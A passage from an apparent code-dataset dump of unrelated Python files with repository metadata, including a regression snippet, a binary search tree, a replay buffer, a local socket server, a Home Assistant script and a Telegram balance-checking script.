#SIMPLE LINEAR PROBABILITY MODEL(LPM)
# Check whether consumption *before* a given date predicts treatment assignment.
df['T']=0+(df['assignment']=='T')
# 0+(boolean Series) converts True/False into a 1/0 dummy for treatment
# assignment (keep boolean expressions wrapped in parentheses).
## SET UP DATA
# Build the X matrix (the regressors): every consumption column, i.e. every
# column whose name starts with 'kwh'.
kwh_cols=[v for v in df.columns.values if v.startswith('kwh')]
# Pretend treatment occurred on 2015-01-04 and keep only earlier dates.
# Column names like 'kwh-2015-01-01' are strings, so the last two characters
# are the day of month: int(v[-2:]) < 4 keeps days 01-03.
kwh_cols=[v for v in kwh_cols if int(v[-2:])<4]
# Set up y (treatment dummy) and X (pre-treatment consumption + intercept).
y=df['T']
X=df[kwh_cols]
X=sm.add_constant(X)
# RUN OLS
ols_model=sm.OLS(y,X)
ols_results= ols_model.fit() #fit the model
print(ols_results.summary())
| [
"muxi.yang@duke.edu"
] | muxi.yang@duke.edu |
e8105a52366def54b4792b62845b992e68d47ddd | 0033af08265ef1853b3f9c6116a85a1c78ca8684 | /modu/python_numpy_tutorial.py | a28ef48236c287f75cb7abdb1a2a7ac009ffb0ef | [
"MIT"
] | permissive | godong9/ml | ffe9b6bba0b5a51555d2cf68035541cb1b30ef7e | 2c735376f4366000685cd97de5df31aabc1c597e | refs/heads/master | 2020-03-25T03:45:29.786540 | 2018-10-02T09:52:12 | 2018-10-02T09:52:12 | 143,358,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 735 | py | # http://cs231n.github.io/python-numpy-tutorial/
# List slicing demo (from the CS231n Python/NumPy tutorial linked above).
nums = list(range(5)) # range is a built-in function that creates a list of integers
print(nums) # Prints "[0, 1, 2, 3, 4]"
print(nums[2:4]) # Get a slice from index 2 to 4 (exclusive); prints "[2, 3]"
print(nums[2:]) # Get a slice from index 2 to the end; prints "[2, 3, 4]"
print(nums[:2]) # Get a slice from the start to index 2 (exclusive); prints "[0, 1]"
print(nums[:]) # Get a slice of the whole list; prints "[0, 1, 2, 3, 4]"
print(nums[:-1]) # Slice indices can be negative; prints "[0, 1, 2, 3]"
nums[2:4] = [8, 9] # Assign a new sublist to a slice (list is mutated in place)
print(nums) # Prints "[0, 1, 8, 9, 4]" | [
"godong9@gmail.com"
] | godong9@gmail.com |
2d5b940d77d34b7de17384dd4e26469ae2274991 | 85c618a75b722b7f3111c44262871bca4a9d0f8f | /tests/lee20130628.py | 79902071098741ab6a8353048dc511a16806f510 | [
"CC0-1.0"
] | permissive | yaukwankiu/armor | 1969ba0fb850f8cec80f7f25f0c2d6cf1bc8dc22 | 6c57df82fe3e7761f43f9fbfe4f3b21882c91436 | refs/heads/master | 2020-05-18T09:17:13.654568 | 2014-12-12T00:08:49 | 2014-12-12T00:08:49 | 20,916,678 | 1 | 0 | null | 2014-07-15T06:20:22 | 2014-06-17T08:54:34 | Python | UTF-8 | Python | false | false | 356 | py | # to test professor lee's proposed algorithm of global comparison
# c.f. https://docs.google.com/file/d/0B84wEiWytQMwQnZrcU50Q29rZnc/edit?usp=sharing
# 28-06-2013
"""
step 1: compute the centroids, and axes
step 2: transform the NWP data to RADAR data linearly
step 3: calculate the correlation
step 4: set the threshold and estimate the f1 score
"""
| [
"yaukwankiu@gmail.com"
] | yaukwankiu@gmail.com |
160221ba014060dc697eb128268aa8bdc031c938 | df0481ec6f72caab283cd27dc20e689cb72d48ce | /news_api/wsgi.py | 3e6f1e1aa7ad9f795c1dd09df3453d431ecbf918 | [
"MIT"
] | permissive | kbakhchedzhy/news-api-board | b1342739fcab9e87547f1cd6ffe270e7926cfe1e | 49cd9e1c34eb7c92e5362a10ead58dd05325e65e | refs/heads/master | 2023-06-04T23:06:20.360141 | 2021-06-14T21:18:00 | 2021-06-14T21:18:00 | 376,905,209 | 0 | 0 | null | 2021-06-14T20:11:01 | 2021-06-14T17:29:51 | Python | UTF-8 | Python | false | false | 393 | py | """
WSGI config for news_api project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Fall back to the project settings module unless one is already configured
# in the environment.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "news_api.settings")
# Module-level WSGI callable picked up by WSGI servers (gunicorn, uWSGI, ...).
application = get_wsgi_application()
| [
"k.bakhchedzhy@gmail.com"
] | k.bakhchedzhy@gmail.com |
c340f5ae35cb6ada1d2fe7cae70e4fcd2150d17a | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf/gsn-edf_ut=2.5_rd=0.8_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=32/sched.py | 95f1fd42aa48e0981658416011cf8039490df40a | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | -X FMLP -Q 0 -L 3 85 400
-X FMLP -Q 0 -L 3 62 200
-X FMLP -Q 0 -L 3 61 200
-X FMLP -Q 1 -L 2 55 300
-X FMLP -Q 1 -L 2 54 175
-X FMLP -Q 1 -L 2 35 200
-X FMLP -Q 2 -L 1 32 125
-X FMLP -Q 2 -L 1 25 100
-X FMLP -Q 3 -L 1 25 175
-X FMLP -Q 3 -L 1 22 100
14 150
10 250
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
9ebb16b914fced04b98c5b6a064841ca987a4e17 | ccf94dcb6b1500fcbbd56964ae8c4832a496b8b3 | /python/baiduads-sdk-auto/test/test_negative_word_packet.py | 2d84a0b0df973bbdbe590260f3d6719c3f2cf800 | [
"Apache-2.0"
] | permissive | baidu/baiduads-sdk | 24c36b5cf3da9362ec5c8ecd417ff280421198ff | 176363de5e8a4e98aaca039e4300703c3964c1c7 | refs/heads/main | 2023-06-08T15:40:24.787863 | 2023-05-20T03:40:51 | 2023-05-20T03:40:51 | 446,718,177 | 16 | 11 | Apache-2.0 | 2023-06-02T05:19:40 | 2022-01-11T07:23:17 | Python | UTF-8 | Python | false | false | 688 | py | """
dev2 api schema
'dev2.baidu.com' api schema # noqa: E501
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import baiduads
from baiduads.negativeword.model.negative_word_packet import NegativeWordPacket
class TestNegativeWordPacket(unittest.TestCase):
    """NegativeWordPacket unit test stubs (auto-generated by openapi-generator;
    see the module docstring above)."""
    def setUp(self):
        # No fixtures needed for the generated stub.
        pass
    def tearDown(self):
        pass
    def testNegativeWordPacket(self):
        """Test NegativeWordPacket"""
        # FIXME: construct object with mandatory attributes with example values
        # model = NegativeWordPacket() # noqa: E501
        pass
if __name__ == '__main__':
    unittest.main()
| [
"tokimekiyxp@foxmail.com"
] | tokimekiyxp@foxmail.com |
f66d367cd6e818d2f464c01786bf01dada756def | fae0230fae5f2e762e299785cbd66ebf7330d937 | /watchtower/_io.py | 9474a5b819d01bd7b9c93eb35a3e6ecabc9bf44c | [] | no_license | NelleV/watchtower | e4bb6c178cfaf9bf909018692662769153a64d2b | 39b5ab198ed03cf4e0b11aa766683b244125bd58 | refs/heads/master | 2022-10-09T18:32:36.344014 | 2022-09-28T10:02:10 | 2022-09-28T10:02:10 | 80,778,407 | 1 | 3 | null | 2017-04-10T18:32:18 | 2017-02-02T23:19:39 | Python | UTF-8 | Python | false | false | 651 | py | import pandas as pd
import os
def _update_and_save(filename, raw, old_raw=None):
"""
"""
if old_raw is not None:
raw = pd.concat([raw, old_raw], ignore_index=True)
if "id" in raw.columns:
subset_column = "id"
elif "sha" in raw.columns:
subset_column = "sha"
else:
raise ValueError("No known column to distinguish subsets")
raw = raw.drop_duplicates(subset=[subset_column])
_save(filename, raw)
def _save(filename, raw):
try:
os.makedirs(os.path.dirname(filename))
except OSError:
pass
raw.to_json(filename, date_format="iso")
| [
"nelle.varoquaux@gmail.com"
] | nelle.varoquaux@gmail.com |
3c52afe069397e41486a991fd1e98c2ef777447d | 3d989666e6ceb2abc9175dcf7b1d0c1f8c76d205 | /py_solution/p172_factorial_trailing_zeroes.py | 2e88229ace7c046a24203162ad16036725347fd1 | [] | no_license | dengshilong/leetcode | 00ae0898b4645efd1de69a13f2fa92606e899297 | 5ab258f04771db37a3beb3cb0c490a06183f7b51 | refs/heads/master | 2021-01-10T11:58:10.396399 | 2020-04-10T12:10:54 | 2020-04-10T12:10:54 | 47,912,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 480 | py | class Solution(object):
def trailingZeroes(self, n):
"""
:type n: int
:rtype: int
"""
res = 0
while n >= 5:
temp = n // 5
res += temp
n = temp
return res
if __name__ == "__main__":
    # Smoke tests for Solution.trailingZeroes (trailing zeros of n!).
    solution = Solution()
    assert solution.trailingZeroes(3) == 0
    assert solution.trailingZeroes(5) == 1
    assert solution.trailingZeroes(10) == 2
    assert solution.trailingZeroes(25) == 6
| [
"dengshilong1988@gmail.com"
] | dengshilong1988@gmail.com |
a9e659c7b7d5d6885ceeb0b122e3403266a264f2 | a5b4e9f912eb4b76ff573c36d34d2b0d031bc2c3 | /lapac/replay.py | c606ea1783c236b9bcd00e8739439bf65f5f2337 | [] | no_license | harwiltz/lapac | d13d99c323fd1357fe24b5ce2492ca4a64b5586d | 7ed711a162e48e545d9f9f515eef0fe91a96b430 | refs/heads/master | 2020-11-27T15:55:40.674235 | 2019-12-22T06:16:03 | 2019-12-22T06:16:03 | 229,519,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,462 | py | import numpy as np
import torch
class SequenceReplayBuffer(object):
    """Fixed-capacity ring buffer of fixed-length transition sequences.

    Each slot holds sequence_length actions/rewards/step-types plus
    sequence_length + 1 image observations (the extra frame is the final
    observation).  ``sample`` returns uniformly drawn slots as float tensors
    on the detected device; step types are returned as the raw numpy array.
    """

    def __init__(self, capacity, sequence_length, image_shape, action_shape):
        self._pointer = 0
        self._weight = 0
        self._capacity = capacity
        self._device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        # One more image than actions/rewards: s_0 ... s_T for T actions.
        self._image_buf = np.zeros(shape=(capacity, (sequence_length + 1), *image_shape))
        self._action_buf = np.zeros(shape=(capacity, sequence_length, *action_shape))
        self._rew_buf = np.zeros(shape=(capacity, sequence_length))
        self._step_type_buf = np.zeros(shape=(capacity, sequence_length))

    def add(self, image_seq, action_seq, rew_seq, step_type):
        """Store one sequence, overwriting the oldest slot once full."""
        self._weight = min(self._weight + 1, self._capacity)
        slot = self._pointer
        self._image_buf[slot] = image_seq
        self._action_buf[slot] = action_seq
        self._rew_buf[slot] = rew_seq
        # step_type entries are enum-like objects; store their numeric .value.
        self._step_type_buf[slot] = [st.value for st in step_type]
        self._pointer = (slot + 1) % self._capacity

    def sample(self, batch_size=1):
        """Draw ``batch_size`` stored sequences uniformly with replacement."""
        picks = np.random.randint(0, self._weight, size=batch_size)
        return (
            torch.FloatTensor(self._image_buf[picks]).to(self._device),
            torch.FloatTensor(self._action_buf[picks]).to(self._device),
            torch.FloatTensor(self._rew_buf[picks]).to(self._device),
            self._step_type_buf[picks],
        )
| [
"harley.wiltzer@mail.mcgill.ca"
] | harley.wiltzer@mail.mcgill.ca |
800a94fabc0155c29398bcc17a0e4d8358db9725 | 494f52fcf12e90b57e52771c7dd3954b99383bfb | /Server.py | 6e7e3e038a7b99ac862c18a1827e5ba292f1192f | [] | no_license | EricLuoisme/Network-Testing | 7af4c5f63806737ab6b6c11e7188694ac9aa58f2 | 9a25a35da2f65ff96230c7b2fd61f6ec642b00ea | refs/heads/master | 2020-04-16T17:51:37.912795 | 2019-01-15T07:57:37 | 2019-01-15T07:57:37 | 165,791,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 977 | py |
# Echo-style TCP server: accepts a single connection and answers every
# received message with a fixed reply string.
import socket
import sys
HOST = '127.0.0.100' # Loopback address to bind (local clients only, despite the original comment)
PORT = 50007 # Arbitrary non-privileged port
s = None
# Try every address family / socket type that getaddrinfo resolves for
# HOST:PORT until one can be created, bound and listened on (this pattern
# handles IPv4 and IPv6 transparently).
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC,
                              socket.SOCK_STREAM, 0, socket.AI_PASSIVE):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError as msg:
        s = None
        continue
    try:
        s.bind(sa)
        s.listen(1)
    except OSError as msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print('could not open socket')
    sys.exit(1)
# Serve exactly one client connection, then exit when it disconnects.
conn, addr = s.accept()
with conn:
    print('Connected by', addr)
    while True:
        data = conn.recv(1024)
        if not data: break
        # conn.send(data)
        back = str('hahaahahahah')
        conn.send(back.encode('utf-8'))
        # send() requires bytes, hence the utf-8 encoding above
| [
"u6270944@anu.edu.au"
] | u6270944@anu.edu.au |
4b264c20eb1bab3755a8cd94df85f8220efbec42 | 6488bfaf433fcdcaac0534d099ea3cb368c7a0a9 | /Trees/BinarySearchTree.py | d66cc702cd56c9879660f5c36672f154c0b5a7a7 | [] | no_license | nma96/Python-Libraries | 413074c2a19732bdf9a4c0dfb7153daceb1cc18f | 3c6491584287e9c9464c90e6e48621619f7f9f6e | refs/heads/master | 2022-11-04T20:36:20.544296 | 2020-06-20T02:57:29 | 2020-06-20T02:57:29 | 273,060,779 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,734 | py | class TreeNode:
    def __init__(self, key, val, left=None, right=None, parent=None):
        """One node of a binary search tree: a key/payload pair plus
        left/right child links and a back-link to the parent (None for
        missing neighbours)."""
        self.key = key
        self.payload = val
        self.leftChild = left
        self.rightChild = right
        self.parent = parent
    def hasLeftChild(self):
        # Returns the left child itself (truthy) or None -- used as a boolean.
        return self.leftChild
    def hasRightChild(self):
        return self.rightChild
    def isLeftChild(self):
        # Truthy when this node is its parent's left child (falsy for the root).
        return self.parent and self.parent.leftChild == self
    def isRightChild(self):
        return self.parent and self.parent.rightChild == self
    def isRoot(self):
        return not self.parent
    def isLeaf(self):
        return not (self.rightChild or self.leftChild)
    def hasAnyChildren(self):
        return self.rightChild or self.leftChild
    def hasBothChildren(self):
        return self.rightChild and self.leftChild
    def replaceNodeData(self, key, value, lc, rc):
        """Overwrite this node's key/payload and both children, re-parenting
        the new children so they point back at this node."""
        self.key = key
        self.payload = value
        self.leftChild = lc
        self.rightChild = rc
        if self.hasLeftChild():
            self.leftChild.parent = self
        if self.hasRightChild():
            self.rightChild.parent = self
class BinarySearchTree:
    """A key/value map backed by an (unbalanced) binary search tree.

    Supports the mapping protocol: ``tree[key] = val``, ``tree[key]``,
    ``key in tree``, ``del tree[key]``, ``len(tree)``.

    Bug fix: spliceOut/findSuccessor/findMin were written as if they were
    TreeNode instance methods (they read node-only attributes through
    ``self``) but were defined on this class, so ``remove()`` raised an
    AttributeError whenever it deleted a node with two children.  They are
    now static helpers that take the node to operate on explicitly.
    """

    def __init__(self):
        self.root = None   # TreeNode at the top of the tree, or None when empty
        self.size = 0      # number of distinct keys stored

    def length(self):
        """Return the number of keys stored (same as len(tree))."""
        return self.size

    def __len__(self):
        return self.size

    def put(self, key, val):
        """Insert key/val; overwrite the payload when the key already exists."""
        if self.root:
            if self._put(key, val, self.root):
                self.size = self.size + 1
        else:
            self.root = TreeNode(key, val)
            self.size = self.size + 1

    def _put(self, key, val, currentNode):
        """Recursive insert below currentNode.

        Returns True when a new node was created, False when an existing
        key's payload was overwritten.  (Previously a duplicate key silently
        created a second, unreachable node and still bumped the size, which
        contradicts the __setitem__ mapping semantics.)
        """
        if key == currentNode.key:
            currentNode.payload = val
            return False
        if key < currentNode.key:
            if currentNode.hasLeftChild():
                return self._put(key, val, currentNode.leftChild)
            currentNode.leftChild = TreeNode(key, val, parent=currentNode)
            return True
        if currentNode.hasRightChild():
            return self._put(key, val, currentNode.rightChild)
        currentNode.rightChild = TreeNode(key, val, parent=currentNode)
        return True

    def __setitem__(self, k, v):
        self.put(k, v)

    def get(self, key):
        """Return the payload stored under key, or None when absent."""
        if self.root:
            res = self._get(key, self.root)
            if res:
                return res.payload
            else:
                return None
        else:
            return None

    def _get(self, key, currentNode):
        """Return the TreeNode holding key in this subtree, or None."""
        if not currentNode:
            return None
        elif currentNode.key == key:
            return currentNode
        elif key < currentNode.key:
            return self._get(key, currentNode.leftChild)
        else:
            return self._get(key, currentNode.rightChild)

    def __getitem__(self, key):
        return self.get(key)

    def __contains__(self, key):
        return self._get(key, self.root) is not None

    def delete(self, key):
        """Remove key from the tree; raise KeyError when it is absent."""
        if self.size > 1:
            nodeToRemove = self._get(key, self.root)
            if nodeToRemove:
                self.remove(nodeToRemove)
                self.size = self.size - 1
            else:
                raise KeyError('Error, key not in tree')
        elif self.size == 1 and self.root.key == key:
            self.root = None
            self.size = self.size - 1
        else:
            raise KeyError('Error, key not in tree')

    def __delitem__(self, key):
        self.delete(key)

    @staticmethod
    def findMin(node):
        """Return the node with the smallest key in the subtree rooted at node."""
        current = node
        while current.hasLeftChild():
            current = current.leftChild
        return current

    @staticmethod
    def findSuccessor(node):
        """Return the node holding the next-larger key than node, or None."""
        succ = None
        if node.hasRightChild():
            succ = BinarySearchTree.findMin(node.rightChild)
        else:
            if node.parent:
                if node.isLeftChild():
                    succ = node.parent
                else:
                    # Temporarily detach node so the parent's successor search
                    # cannot walk back down into this subtree.
                    node.parent.rightChild = None
                    succ = BinarySearchTree.findSuccessor(node.parent)
                    node.parent.rightChild = node
        return succ

    @staticmethod
    def spliceOut(node):
        """Unlink node (a leaf or a single-child node) from the tree."""
        if node.isLeaf():
            if node.isLeftChild():
                node.parent.leftChild = None
            else:
                node.parent.rightChild = None
        elif node.hasAnyChildren():
            if node.hasLeftChild():
                if node.isLeftChild():
                    node.parent.leftChild = node.leftChild
                else:
                    node.parent.rightChild = node.leftChild
                node.leftChild.parent = node.parent
            else:
                if node.isLeftChild():
                    node.parent.leftChild = node.rightChild
                else:
                    node.parent.rightChild = node.rightChild
                node.rightChild.parent = node.parent

    def remove(self, currentNode):
        """Detach currentNode from the tree, relinking children as needed."""
        if currentNode.isLeaf():  # leaf
            if currentNode == currentNode.parent.leftChild:
                currentNode.parent.leftChild = None
            else:
                currentNode.parent.rightChild = None
        elif currentNode.hasBothChildren():  # interior
            # Replace this node's key/payload with its in-order successor,
            # then splice the successor (which has at most one child) out.
            succ = self.findSuccessor(currentNode)
            self.spliceOut(succ)
            currentNode.key = succ.key
            currentNode.payload = succ.payload
        else:  # this node has exactly one child
            if currentNode.hasLeftChild():
                if currentNode.isLeftChild():
                    currentNode.leftChild.parent = currentNode.parent
                    currentNode.parent.leftChild = currentNode.leftChild
                elif currentNode.isRightChild():
                    currentNode.leftChild.parent = currentNode.parent
                    currentNode.parent.rightChild = currentNode.leftChild
                else:
                    # Removing the root: absorb the single child's data/links.
                    currentNode.replaceNodeData(currentNode.leftChild.key,
                                                currentNode.leftChild.payload,
                                                currentNode.leftChild.leftChild,
                                                currentNode.leftChild.rightChild)
            else:
                if currentNode.isLeftChild():
                    currentNode.rightChild.parent = currentNode.parent
                    currentNode.parent.leftChild = currentNode.rightChild
                elif currentNode.isRightChild():
                    currentNode.rightChild.parent = currentNode.parent
                    currentNode.parent.rightChild = currentNode.rightChild
                else:
                    currentNode.replaceNodeData(currentNode.rightChild.key,
                                                currentNode.rightChild.payload,
                                                currentNode.rightChild.leftChild,
                                                currentNode.rightChild.rightChild)
"nikhilaatrei96@gmail.com"
] | nikhilaatrei96@gmail.com |
15d3ac01514ea7cdfe700a4c8d1989e8ffef3f2f | f6f24e56f8d3fa576950c7c8008a91502d19938b | /keep/lasthit_07_1vs1 1 creep/server/webservice.py | d82d81e3b2007426f07b53b4798b1d377742b8a0 | [] | no_license | peachman05/BotLastHit | dc42862496f8b61c9efd4476832e29554f08f12f | d48917d56a76de81ab35a1067cf011a41fd96001 | refs/heads/master | 2021-09-07T23:48:24.892765 | 2018-03-03T14:06:48 | 2018-03-03T14:06:48 | 119,542,895 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 911 | py | from flask import Flask, jsonify, request
from DQN import DQNAgent
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# Force CPU-only execution for the serving process.
os.environ["CUDA_VISIBLE_DEVICES"] = ""
app = Flask(__name__)
# Agent dimensions: state vector size, number of discrete actions, hidden
# layer widths.  Presumably these must match the client-side agent -- confirm.
num_state = 31
num_action = 5
num_hidden_node = [24,24]
# m =
dqn_agent = DQNAgent(num_state,num_action,num_hidden_node)
@app.route('/model', methods=['GET'])
def get_model():
    # Return the agent's current model (whatever DQNAgent.get_model yields) as JSON.
    return jsonify(dqn_agent.get_model())
    # return "test"
@app.route('/update', methods=['POST'])
def update():
    # Run a training update on the posted payload, then return the refreshed
    # model so the caller can sync immediately.
    dqn_agent.run(request.json)
    print("finish run")
    return jsonify(dqn_agent.get_model())
# @app.route('/CreepBlockAI/dump', methods=['GET'])
# def dump():
#     m.dump()
#     return jsonify({})
# @app.route('/CreepBlockAI/load', methods=['POST'])
# def load():
#     m.load(request.json['file'])
#     return jsonify({})
if __name__ == '__main__':
    app.run(debug=True)
app.run(debug=True) | [
"patcharapon1995@gmail.com"
] | patcharapon1995@gmail.com |
5e532275021cbb80eefe6334a4bee586a7e19910 | 79a273c1f2b59ae9adb3f721b228f889aa8b3f8e | /Examples/Alok Saboo/homeassistant/python_scripts/meta_device_tracker.py | 1552a0ab345521cdd9a42f08f3708398cd8c917f | [] | no_license | AndrMoura/DISHASS | 874e3566c212540f71383b8d95810264b957c44e | 5f5e987313d76d0a8796e093257bf7c66c399c5f | refs/heads/master | 2020-04-12T19:59:11.499861 | 2019-01-31T00:05:18 | 2019-01-31T00:05:18 | 162,723,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,318 | py | # Combine multiple device trackers into one entity
# You can call the script using the following:
# - service: python_script.meta_device_tracker
# data_template:
# entity_id: '{{trigger.entity_id}}'
# OPTIONS
# List the trackers for each individual
RashmiTrackers = ['device_tracker.rashmisiphone', 'device_tracker.rashmiphone_rashmiphone',
'device_tracker.rashmiappiphone', 'device_tracker.sonu_sonu',
'device_tracker.e1594e5321df414c82daf655d5282fca']
AlokTrackers = ['device_tracker.myiphone', 'device_tracker.alokphone_alokphone',
'device_tracker.alokiosiphone', 'device_tracker.alok_alok',
'device_tracker.elantrase', 'device_tracker.b4445761f6c04b7f835fcfdc03b47111']
# Get the entity that triggered the automation
# `data` and `hass` are globals injected by Home Assistant's python_script
# sandbox: `data` is the service-call payload, `hass` is the core API object.
triggeredEntity = data.get('entity_id')
# Pick the meta-tracker identity based on whose tracker fired the automation.
if triggeredEntity in AlokTrackers:
    newFriendlyName = 'Alok Tracker'
    newEntityPicture = '/local/icons/Alok.png'
    metatrackerName = 'device_tracker.meta_alok'
elif triggeredEntity in RashmiTrackers:
    newFriendlyName = 'Rashmi Tracker'
    newEntityPicture = '/local/icons/Rashmi.png'
    metatrackerName = 'device_tracker.meta_rashmi'
else:
    # Unknown tracker.  Fix: newEntityPicture used to be left undefined on
    # this branch, making the hass.states.set() payload below raise NameError.
    newFriendlyName = None
    newEntityPicture = None
    metatrackerName = None
# Get current & new state.  currentState is None until the meta entity has
# been created once; newState is assumed non-None because the automation
# only triggers for entities listed above -- TODO confirm.
newState = hass.states.get(triggeredEntity)
currentState = hass.states.get(metatrackerName)
# Get new data
newSource = newState.attributes.get('source_type')
newFriendlyName_temp = newState.attributes.get('friendly_name')  # currently unused
# If GPS source, take the fresh coordinates
if newSource == 'gps':
    newLatitude = newState.attributes.get('latitude')
    newLongitude = newState.attributes.get('longitude')
    newgpsAccuracy = newState.attributes.get('gps_accuracy')
# Otherwise keep the last known coordinates.  Fix: guard against currentState
# being None (first run), which used to raise an AttributeError here.
elif (newSource is not None and currentState is not None
        and currentState.attributes.get('latitude') is not None):
    newLatitude = currentState.attributes.get('latitude')
    newLongitude = currentState.attributes.get('longitude')
    newgpsAccuracy = currentState.attributes.get('gps_accuracy')
# No usable coordinates at all
else:
    newLatitude = None
    newLongitude = None
    newgpsAccuracy = None
# Battery: prefer the fresh value, fall back to the last known one
if newState.attributes.get('battery') is not None:
    newBattery = newState.attributes.get('battery')
elif currentState is not None and currentState.attributes.get('battery') is not None:
    newBattery = currentState.attributes.get('battery')
else:
    newBattery = None
# Velocity: same preference order as battery
if newState.attributes.get('velocity') is not None:
    newVelocity = newState.attributes.get('velocity')
elif currentState is not None and currentState.attributes.get('velocity') is not None:
    newVelocity = currentState.attributes.get('velocity')
else:
    # NOTE(review): falls back to the meta entity's state; currentState would
    # still be None on a very first run with an empty new state -- confirm.
    newVelocity = None
if newState.state is not None:
    newStatus = newState.state
else:
    newStatus = currentState.state
# Create/refresh the combined device_tracker.meta_* entity
hass.states.set(metatrackerName, newStatus, {
    'friendly_name': newFriendlyName,
    'entity_picture': newEntityPicture,
    'source_type': newSource,
    'battery': newBattery,
    'gps_accuracy': newgpsAccuracy,
    'latitude': newLatitude,
    'longitude': newLongitude,
    'velocity': newVelocity,
    'update_source': triggeredEntity,
    'show_last_changed': 'true'
})
| [
"12pita3naru@gmail.com"
] | 12pita3naru@gmail.com |
2b7a2c90bae671eb7855d16bc122acb73d9dafdc | a16f3f148455395596405fd7b11df62932f3937d | /career/rabbit/send2.py | 8701013073a594d7af24fe5ebb5aa71253c6e7c5 | [] | no_license | wyzane/skill-general | 8eeb5984c42ec2bcb59c634c7f7bca7c2476977b | 6e5a498dd5b63117a6a20aa81ac67a1999d8ac21 | refs/heads/master | 2020-05-22T21:51:18.061659 | 2019-10-18T15:56:26 | 2019-10-18T15:56:26 | 186,535,789 | 0 | 0 | null | 2019-10-18T15:52:54 | 2019-05-14T03:12:39 | Python | UTF-8 | Python | false | false | 619 | py | import sys
import pika
# Publish one durable message to the local RabbitMQ 'task_queue' queue.
conn = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = conn.channel()
channel.queue_declare(queue='task_queue',
                      durable=True) # durable queue: survives a RabbitMQ restart
# Message text comes from the command line, with a default fallback.
message = ' '.join(sys.argv[1:]) or "hello world"
channel.basic_publish(exchange='',
                      routing_key='task_queue',
                      body=message,
                      properties=pika.BasicProperties(
                          delivery_mode=2, # persistent message (written to disk)
                      ))
print("send message: ", message)
conn.close()
| [
"wyzane1207@163.com"
] | wyzane1207@163.com |
b852ccf65e8fa19c3838b3e99c7100195235941a | e3f894dae716fbd1edde76c1789bb0dc25e601c9 | /balance.py | ac1da60722c6bc866032d133bdc8682dd450c637 | [] | no_license | Wizard-C/Telegram_mining_bot | f2c244b75a83da4ffdce7ac249d0f3bdc653b179 | 45ecfc67836f8e171cf09af842feaf5b0673e634 | refs/heads/master | 2022-11-25T05:44:05.626025 | 2020-07-20T16:59:10 | 2020-07-20T16:59:10 | 279,015,305 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,133 | py | import sqlite3
import time
from telethon import TelegramClient
from telethon import sync, events
import re
import json

# Account credentials (phone, name, Telegram API id/hash) are read from a
# local SQLite database with one row per account.
db = sqlite3.connect('Account.db')
cur = db.cursor()

number_of_iterations = 2
# Running LTC total.  Bug fix: this used to be re-assigned to a *string*
# ('{: .8f}'.format(...)) inside the loop, so on the second iteration
# `total_amount + amount_now` raised TypeError and control always fell into
# the except block.  It now stays numeric and is only formatted for printing.
total_amount = 0.0
LTC_RUB_RATE = 3107  # hard-coded LTC -> RUB conversion rate

try:
    for i in range(1, number_of_iterations + 1):
        # Fetch this account's credentials from the database.
        cur.execute(f"SELECT PHONE FROM Account WHERE ID = '{i}'")
        Phone = str(cur.fetchone()[0])
        print("Аккаунт: " + Phone, end=', ')
        cur.execute(f"SELECT NAME FROM Account WHERE ID = '{i}'")
        Name = str(cur.fetchone()[0])
        print(Name)
        cur.execute(f"SELECT API_ID FROM Account WHERE ID = '{i}'")
        api_id = str(cur.fetchone()[0])
        cur.execute(f"SELECT API_HASH FROM Account WHERE ID = '{i}'")
        api_hash = str(cur.fetchone()[0])
        session = str("anon" + str(i))
        client = TelegramClient(session, api_id, api_hash)
        client.start()
        # Locate the bot dialog.  NOTE(review): dialog_LTC stays unbound if
        # the dialog is missing; the except below would then catch the error.
        dialogues = client.get_dialogs()
        for dialog in dialogues:
            if dialog.title == 'LTC Click Bot':
                dialog_LTC = dialog
                break
        # Ask the bot for the balance and read its latest reply.
        client.send_message('LTC Click Bot', "/balance")
        time.sleep(1)
        messages = client.get_messages(dialog_LTC, limit=1)
        for msg in messages:
            message_text = str(msg.message)
        # Strip the reply down to the bare number, e.g.
        # "Available balance: 0.123 LTC" -> "0.123".
        balance_text = message_text.replace('Available balance: ', '')
        balance_text = balance_text.replace(' LTC', '')
        print(balance_text, ' LTC')
        print('{:.2f}'.format(float(balance_text) * LTC_RUB_RATE), ' RUB')
        amount_now = float(balance_text)
        total_amount = total_amount + amount_now
        time.sleep(1)
        if i == number_of_iterations:
            print("\nВсего добыто LTC: ", '{: .8f}'.format(total_amount))
            print("Всего добыто RUB: ", '{: .2f}'.format(total_amount * LTC_RUB_RATE))
            break
except Exception:
    # Narrowed from a bare `except:` so Ctrl-C (KeyboardInterrupt) can still
    # stop the script instead of being reported as an ordinary error.
    print("\nВсего добыто LTC: ", '{: .8f}'.format(total_amount))
    print("Всего добыто RUB: ", '{: .2f}'.format(total_amount * LTC_RUB_RATE))
print('Ошибка, преждевременный выход из цикла') | [
"BlueSkyC@mail.ru"
] | BlueSkyC@mail.ru |
